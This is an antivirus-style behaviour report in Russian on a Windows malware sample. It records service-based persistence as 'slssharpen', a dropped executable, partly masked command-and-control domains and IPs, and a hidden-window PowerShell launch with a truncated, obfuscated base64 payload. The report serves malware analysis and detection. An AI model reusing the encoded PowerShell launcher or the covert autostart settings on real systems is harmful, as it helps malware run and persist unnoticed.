Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\slssharpen] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\slssharpen] 'ImagePath' = '"%WINDIR%\SysWOW64\slssharpen.exe"'
Создает следующие сервисы
- 'slssharpen' "%WINDIR%\SysWOW64\slssharpen.exe"
- 'slssharpen' %WINDIR%\SysWOW64\slssharpen.exe
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAgACgAIAAkAHMASABlAEwAbABpAEQAWwAxAF0AKwAkAFMASABlAEwAbABpAEQAWwAxADMAXQArACcAWAAnACkAIAAoACAATgBlAFcALQBvAGIASgBFAEMAVAAgAFMAeQBzAFQAZQBtAC4AaQBPAC4AQwBvAE0AcABSAGUAUwBTAGkATwBOAC4AZABlAE...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\322845.exe
Перемещает следующие файлы
- %TEMP%\322845.exe в %WINDIR%\syswow64\slssharpen.exe
Сетевая активность
Подключается к
- 'ni####tourguide.net':80
- 'st####icronics.org':80
- 'st####icronics.org':443
- 'id###balance.hu':80
- '15#.#.171.246':443
- '11#.#42.247.110':80
- '10#.#1.20.17':80
- '21#.#6.44.93':80
- '98.##4.2.113':80
TCP
Запросы HTTP GET
- http://www.st####cronics.de/uEqPnL/
Другие
- 'st####icronics.org':443
UDP
- DNS ASK ni####tourguide.net
- DNS ASK te###ademae.com
- DNS ASK st####icronics.org
- DNS ASK st####cronics.de
- DNS ASK sw###japan.com
- DNS ASK id###balance.hu
Другое
Создает и запускает на исполнение
- '%TEMP%\322845.exe'
- '%WINDIR%\syswow64\slssharpen.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAgACgAIAAkAHMASABlAEwAbABpAEQAWwAxAF0AKwAkAFMASABlAEwAbABpAEQAWwAxADMAXQArACcAWAAnACkAIAAoACAATgBlAFcALQBvAGIASgBFAEMAVAAgAFMAeQBzAFQAZQBtAC4AaQBPAC4AQwBvAE0AcABSAGUAUwBTAGkATwBOAC4AZABlAE...' (со скрытым окном)
